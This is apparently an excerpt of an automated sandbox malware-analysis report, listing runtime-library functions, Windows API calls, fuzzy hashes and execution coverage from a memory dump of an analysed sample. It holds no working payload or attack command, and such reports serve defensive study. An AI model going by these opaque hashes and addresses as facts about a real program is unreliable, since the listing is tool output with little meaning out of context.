                                                                                • GetLastError.KERNEL32(?,?,00AB8E31,00AB7403,00AB66F5), ref: 00AB8E48
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AB8E56
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AB8E6F
                                                                                • SetLastError.KERNEL32(00000000,00AB8E31,00AB7403,00AB66F5), ref: 00AB8EC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: c7300ed475118650f42a141193dfe20548eee88439b78e816c39a6336b0eb58c
                                                                                • Instruction ID: f64b99b5d4713e65650727dc6f530d8202135f12dadb87bd8353a6a93037a3d1
                                                                                • Opcode Fuzzy Hash: c7300ed475118650f42a141193dfe20548eee88439b78e816c39a6336b0eb58c
                                                                                • Instruction Fuzzy Hash: CC018F326093125EE62427B8BD859EB7B5CFB31775B200229F114A61F3FFA6DC05D192
                                                                                Function 00AB2830 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00AB2835
                                                                                  • Part of subcall function 00AB324A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AB3256
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00AB2845
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_$std::invalid_argument::invalid_argument
                                                                                • String ID: ios_base::badbit set$string too long$vector too long
                                                                                • API String ID: 3649684471-2138753838
                                                                                • Opcode ID: ae1a2743e7922e0660cd3c02a1e4461af5816acc5457a44abf740f17f295c70a
                                                                                • Instruction ID: 52da4107de0e017a3535b6a930deb44a83aa9f63a8cf218acae2c93afc10b3ae
                                                                                • Opcode Fuzzy Hash: ae1a2743e7922e0660cd3c02a1e4461af5816acc5457a44abf740f17f295c70a
                                                                                • Instruction Fuzzy Hash: 2341F431B002049FC715EF68DD80AAEBBE8FF89350F44066EF59997342D735A919C7A2
                                                                                Function 00ABE3A2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,83CA0057,?,?,00000000,00ACD374,000000FF,?,00ABE332,00000002,?,00ABE306,00ABB1B4), ref: 00ABE3D7
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00ABE3E9
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00ACD374,000000FF,?,00ABE332,00000002,?,00ABE306,00ABB1B4), ref: 00ABE40B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 6284c3580f2e46149e614c99dcabdc106ea4fcaf263f026fcfefdc67ac0d5d11
                                                                                • Instruction ID: effa851694d9b2b1300555ebea361d3db7bbef263178d6f8993a3bac4ff39a96
                                                                                • Opcode Fuzzy Hash: 6284c3580f2e46149e614c99dcabdc106ea4fcaf263f026fcfefdc67ac0d5d11
                                                                                • Instruction Fuzzy Hash: 44016231A40655FFDB11CF90DC49FEEBBB8FB04B10F05462AE811A22D1DBB59901CA91
                                                                                Function 00AB5193 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB519A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB51A5
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB5213
                                                                                  • Part of subcall function 00AB52F6: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AB530E
                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 00AB51C0
                                                                                • _Yarn.LIBCPMT ref: 00AB51D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                • String ID:
                                                                                • API String ID: 1088826258-0
                                                                                • Opcode ID: 8bad658f871fd16bcb753638fd92c220bb44f2bc85b43b83ff4d49d5c1c87ab9
                                                                                • Instruction ID: 71b8c80971d2dd205cd268cc390200d27e4e843c1ce447ee4444010bb4573f2f
                                                                                • Opcode Fuzzy Hash: 8bad658f871fd16bcb753638fd92c220bb44f2bc85b43b83ff4d49d5c1c87ab9
                                                                                • Instruction Fuzzy Hash: EC015A75A01A109BCB06EB70DA55ABDBBA9FB95740B19410AE90257383CF34AE02CB81
                                                                                Function 00AB37D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB37DC
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3826
                                                                                  • Part of subcall function 00AB5291: _Yarn.LIBCPMT ref: 00AB52B0
                                                                                  • Part of subcall function 00AB5291: _Yarn.LIBCPMT ref: 00AB52D4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                • String ID: bad locale name
                                                                                • API String ID: 482894088-1405518554
                                                                                • Opcode ID: 87114d7162ab7673f4130b0b7010717b6f582a0a89acd436cd5510887308ce6b
                                                                                • Instruction ID: dee9ca622fd199bf5e0d15ea8f2caa872387c445965b694b9103bdda87216b17
                                                                                • Opcode Fuzzy Hash: 87114d7162ab7673f4130b0b7010717b6f582a0a89acd436cd5510887308ce6b
                                                                                • Instruction Fuzzy Hash: 39018071905B449ECB209F7A958158AFFE4BF29350B40896FF18D87B02C730E600CB99
                                                                                Function 00AB9F82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00AD6170,00000000,00000800,?,00AB9F33,00000000,?,?,?,?,?,00ABA05D,00000002,FlsGetValue,00ACFD48,FlsGetValue), ref: 00AB9F8F
                                                                                • GetLastError.KERNEL32(?,00AB9F33,00000000,?,?,?,?,?,00ABA05D,00000002,FlsGetValue,00ACFD48,FlsGetValue,00000000,?,00AB8EED), ref: 00AB9F99
                                                                                • LoadLibraryExW.KERNEL32(00AD6170,00000000,00000000,?,00AD6170,?,?,?,?), ref: 00AB9FC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID: api-ms-
                                                                                • API String ID: 3177248105-2084034818
                                                                                • Opcode ID: 547c1f96c597926f03dfe05b866d6ba95a30463d676ee06e70db31518d6bb8e0
                                                                                • Instruction ID: 83fb69995dfb513a314a39088c6ac111695e606c115ebddf7259c520c0f7464a
                                                                                • Opcode Fuzzy Hash: 547c1f96c597926f03dfe05b866d6ba95a30463d676ee06e70db31518d6bb8e0
                                                                                • Instruction Fuzzy Hash: 43E048302C4204BBEF105FB0ED06FA93E6AEB10B55F114420FB0DE40E6E7A1DD5189C5
                                                                                Function 00AC27F1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleOutputCP.KERNEL32(83CA0057,00000000,00000000,00ABBB18), ref: 00AC2854
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AC2AAF
                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AC2AF7
                                                                                • GetLastError.KERNEL32 ref: 00AC2B9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                • String ID:
                                                                                • API String ID: 2112829910-0
                                                                                • Opcode ID: 21ce6cbf95145000dd277f43394dfd563502a0ebbb42969c1933b74c17f0e12b
                                                                                • Instruction ID: c17535d62bb27f1c41a928bd88c7c52b1634d518ea4bc8401161723cacf5abe6
                                                                                • Opcode Fuzzy Hash: 21ce6cbf95145000dd277f43394dfd563502a0ebbb42969c1933b74c17f0e12b
                                                                                • Instruction Fuzzy Hash: 95D147B5D00258AFCF15CFA8C880AADBBB5FF49314F19852EE856EB351D730A946CB50
                                                                                Function 00AB8F51 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                • Opcode ID: f838fcec60e98aa0af822d28068fd2492b4b1a24dd0c0dc3c52a3a3e5f241f4e
                                                                                • Instruction ID: 06722c3a669988dfe7ba1d58fd5263f1dc0f3177e43431d0deb84367c256ac33
                                                                                • Opcode Fuzzy Hash: f838fcec60e98aa0af822d28068fd2492b4b1a24dd0c0dc3c52a3a3e5f241f4e
                                                                                • Instruction Fuzzy Hash: 3351B271604202AFEB24AF14D981BFBBBADEF40710F14452DEA11476A3EB36ED80D791
                                                                                Function 00AC5883 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • GetLastError.KERNEL32 ref: 00AC58E7
                                                                                • __dosmaperr.LIBCMT ref: 00AC58EE
                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 00AC5928
                                                                                • __dosmaperr.LIBCMT ref: 00AC592F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1913693674-0
                                                                                • Opcode ID: 2ae408d21de23e9fd987ff03387034830b09e8a5d4747fde0bc453be4c9647c4
                                                                                • Instruction ID: ac540ce119586199c4d9da15d97ad88f898e625cc645495ce8294d3ecdaf8b06
                                                                                • Opcode Fuzzy Hash: 2ae408d21de23e9fd987ff03387034830b09e8a5d4747fde0bc453be4c9647c4
                                                                                • Instruction Fuzzy Hash: E421B371E00A05AFDB10AFB5C980E6BB7ADEF00374712856DF9199B142EB30FC809B91
                                                                                Function 00ABD6E4 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b91b9c15a95f02022a270fea48469435bb6794fd4b87c447f722c3d5169d4a0
                                                                                • Instruction ID: e0d8d1a408de766dd03563c0ed57b376a3ceee3b5f9f9a4344d730b1938f80ed
                                                                                • Opcode Fuzzy Hash: 7b91b9c15a95f02022a270fea48469435bb6794fd4b87c447f722c3d5169d4a0
                                                                                • Instruction Fuzzy Hash: C5216A71600249AFDB20AFB1D981DEB7BADEF003647104525F9299B153FB31EC808BA1
                                                                                Function 00AC689A Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00AC68A2
                                                                                  • Part of subcall function 00AC5467: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AC489B,?,00000000,-00000008), ref: 00AC5513
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC68DA
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AC68FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 158306478-0
                                                                                • Opcode ID: efb12710d367742b8f909a7b4f879697672961ab9200e2e562ec76a809c87100
                                                                                • Instruction ID: 64f98454afc5fe759c19df14eb9844df558271820cde8518bc175617f011461a
                                                                                • Opcode Fuzzy Hash: efb12710d367742b8f909a7b4f879697672961ab9200e2e562ec76a809c87100
                                                                                • Instruction Fuzzy Hash: 4F11D2B2902615BFAB15A7BA9D89E7F6A6CDE9A3E471B012CF501D1101FA30DD4142B0
                                                                                Function 00ACB63B Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000), ref: 00ACB652
                                                                                • GetLastError.KERNEL32(?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18,00ABBB18,?,00AC3175,?), ref: 00ACB65E
                                                                                  • Part of subcall function 00ACB624: CloseHandle.KERNEL32(FFFFFFFE,00ACB66E,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18,00ABBB18), ref: 00ACB634
                                                                                • ___initconout.LIBCMT ref: 00ACB66E
                                                                                  • Part of subcall function 00ACB5E6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00ACB615,00ACA4C3,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18), ref: 00ACB5F9
                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00ACA4D6,00000000,00000001,00000000,00ABBB18,?,00AC2BEE,00ABBB18,00000000,00000000,00ABBB18), ref: 00ACB683
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                • String ID:
                                                                                • API String ID: 2744216297-0
                                                                                • Opcode ID: 9dc0b94ac787ddd29a6115e4ec070b4e21a7f4769f6de1c111f4b3d0566ec79b
                                                                                • Instruction ID: 5009b55ee2af3d6641d6db777f17f930650544fce80cbb41c0dc62fa72d8044f
                                                                                • Opcode Fuzzy Hash: 9dc0b94ac787ddd29a6115e4ec070b4e21a7f4769f6de1c111f4b3d0566ec79b
                                                                                • Instruction Fuzzy Hash: 05F01C36410159BBCF225FE1DD09E9A7F66EB183A0F064014FA1986120CB338C24EBA2
                                                                                Function 00AB8C40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00AB8C7F
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00AB8D33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 3480331319-1018135373
                                                                                • Opcode ID: 3b9cc55e87b8581ae048873b394cc7bd4466d81de6814a092a28f20db301e082
                                                                                • Instruction ID: 2a3461a9d8f48132915c61cedf67c28efce82c989229d7b2527d18dfa360473d
                                                                                • Opcode Fuzzy Hash: 3b9cc55e87b8581ae048873b394cc7bd4466d81de6814a092a28f20db301e082
                                                                                • Instruction Fuzzy Hash: 98419034A002089FCF10DF6CC885ADE7BBDBF46314F148156E914AB293DB39EA11CB90
                                                                                Function 00AB954D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 00AB9572
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2118026453-2084237596
                                                                                • Opcode ID: a8923ca70430833b637216cc4d1d4a83ebdde39555a06e8fea07488d5ae1a33c
                                                                                • Instruction ID: 5fe96228def165c42b10ef968770b0a621bd8b67ae79c2362acb0a0c3888a261
                                                                                • Opcode Fuzzy Hash: a8923ca70430833b637216cc4d1d4a83ebdde39555a06e8fea07488d5ae1a33c
                                                                                • Instruction Fuzzy Hash: 44412871900209AFCF16DF98CD81EEEBBB9BF48304F194199FA05A7262D3399A50DB50

                                                                                Execution Graph

                                                                                Execution Coverage:5.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:11.9%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:39
